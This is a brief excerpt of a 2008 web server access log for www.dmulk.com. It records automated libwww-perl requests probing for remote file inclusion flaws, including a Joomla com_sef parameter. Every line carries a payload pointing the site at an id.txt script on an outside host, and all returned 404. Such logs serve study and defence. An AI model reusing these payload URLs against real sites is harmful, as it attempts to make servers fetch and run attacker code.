201.155.86.251 - - [04/Mar/2008:07:08:04 -0800] "GET /logs/access_080208.log/index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:07:08:07 -0800] "GET /index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:07:08:10 -0800] "GET /logs/index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.86.69.34 - - [04/Mar/2008:07:08:17 -0800] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
